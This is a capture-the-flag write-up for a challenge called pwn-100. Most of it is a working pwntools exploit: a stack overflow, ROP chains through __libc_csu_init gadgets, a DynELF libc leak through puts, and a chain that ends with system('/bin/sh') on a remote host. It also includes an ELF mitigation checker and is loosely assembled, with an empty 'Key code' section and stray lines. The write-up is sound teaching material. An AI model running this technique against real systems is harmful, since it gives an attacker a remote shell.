
pwn: pwn-100

Source: 99网

1. Challenge

1.1. Protection mechanisms

Canary and ASLR are disabled; only NX is enabled.
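The exploit below depends on exactly these properties: no canary means the 72-byte overflow reaches the saved return address, and fixed load addresses mean the gadget, PLT and .bss addresses can be hard-coded. The following is an added example, not code from the original writeup, that reads those properties straight from the ELF64 header and program headers; the images it checks are constructed fixtures, not the challenge binary, and the set of imported symbol names is assumed to be supplied by the caller (for instance from pwntools `ELF('./pwn').symbols`).

```python
import struct

# Program-header types and flags from the ELF64 specification.
PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X = 0x1
ET_DYN = 3
ELFCLASS64 = 2

def parse_elf64(data):
    """Return (e_type, [(p_type, p_flags), ...]) from an ELF64 image in memory."""
    if data[:4] != b"\x7fELF" or data[4] != ELFCLASS64:
        raise ValueError("not an ELF64 image")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    phdrs = []
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        phdrs.append((p_type, p_flags))
    return e_type, phdrs

def mitigations(data, imported_symbols):
    """Report the mitigations the writeup lists (NX, PIE, canary) plus RELRO.

    imported_symbols is the set of dynamic symbol names. It is supplied by the
    caller (assumption) so this block needs no .dynsym parser of its own.
    """
    e_type, phdrs = parse_elf64(data)
    stack = [flags for ptype, flags in phdrs if ptype == PT_GNU_STACK]
    return {
        # No PT_GNU_STACK header at all means the loader defaults to an executable stack.
        "NX": bool(stack) and not (stack[0] & PF_X),
        "PIE": e_type == ET_DYN,
        "Canary": "__stack_chk_fail" in imported_symbols,
        "RELRO": any(ptype == PT_GNU_RELRO for ptype, _ in phdrs),
    }

def build_test_elf(e_type, phdrs):
    """Constructed test fixture: an ELF64 header followed by the given program headers."""
    ident = b"\x7fELF" + bytes([ELFCLASS64, 1, 1, 0]) + b"\x00" * 8
    header = ident + struct.pack("<HHIQQQIHHHHHH", e_type, 62, 1, 0, 64, 0, 0,
                                 64, 56, len(phdrs), 64, 0, 0)
    body = b"".join(struct.pack("<IIQQQQQQ", t, f, 0, 0, 0, 0, 0, 0) for t, f in phdrs)
    return header + body

# Constructed fixture shaped like the writeup's binary: ET_EXEC, NX stack, no RELRO.
PWN100_LIKE = build_test_elf(2, [(1, PF_X | 4), (PT_GNU_STACK, 6)])
```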

1.2. Key code

2. Approach

d = DynELF(leak,elf=elf)
system_addr =  d.lookup('system','libc')
from pwn import *

# Written for Python 3 pwntools: payloads are bytes throughout, and the
# undefined helper p() from the original is replaced by pwntools' p64().
# context(arch="amd64", os="linux", log_level="debug")
con = remote('111.200.241.244', 59165)
# con = process('./pwn')
elf = ELF('./pwn')
puts_addr = elf.plt['puts']      # puts@plt, used to print memory for the leak
read_addr = elf.got['read']      # GOT slot of read, the pointer the csu gadget will call
start_addr = 0x400550            # _start: restart the program after each chain
pop_rdi = 0x400763               # pop rdi ; ret
gadget1 = 0x40075A               # __libc_csu_init: pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
gadget2 = 0x400740               # __libc_csu_init: mov rdx, r13 ; mov rsi, r14 ; mov edi, r15d ; call [r12+rbx*8]
str_addr = 0x601040              # writable .bss address that will hold "/bin/sh"

def leak(addr):
    # puts(addr), then return to _start so the process survives for the next leak
    payload = b"A" * 72 + p64(pop_rdi) + p64(addr) + p64(puts_addr) + p64(start_addr)
    payload = payload.ljust(200, b'B')
    con.send(payload)
    con.recvuntil(b"bye~\n")
    up = b''
    content = b''
    while True:
        c = con.recv(numb=1, timeout=0.1)
        # puts stops at the first NUL and appends '\n'; once nothing follows the
        # newline, replace it with the NUL byte that puts swallowed
        if up == b'\n' and c == b"":
            content = content[:-1] + b'\x00'
            break
        else:
            content += c
            up = c
    content = content[:4]
    return content

d = DynELF(leak, elf=elf)
system_addr = d.lookup('system', 'libc')

# call read(0, str_addr, 8) through the __libc_csu_init gadgets
payload = b"A" * 72
payload += p64(gadget1)
payload += p64(0)          # rbx = 0, so call [r12+rbx*8] uses r12 directly
payload += p64(1)          # rbp = 1, so rbx+1 == rbp and the loop does not repeat
payload += p64(read_addr)  # r12 = &read@got
payload += p64(8)          # r13 -> rdx = 8 (count)
payload += p64(str_addr)   # r14 -> rsi = str_addr (buffer)
payload += p64(0)          # r15 -> edi = 0 (stdin)
payload += p64(gadget2)
payload += b"\x00" * 56    # add rsp,8 plus the six pops after the call
payload += p64(start_addr)
payload = payload.ljust(200, b'B')

# input str
con.send(payload)
con.recvuntil(b"bye~\n")
con.send(b'/bin/sh\x00')

# call system("/bin/sh")
payload = b"A" * 72
payload += p64(pop_rdi) + p64(str_addr) + p64(system_addr)
payload = payload.ljust(200, b"B")
con.send(payload)

con.interactive()
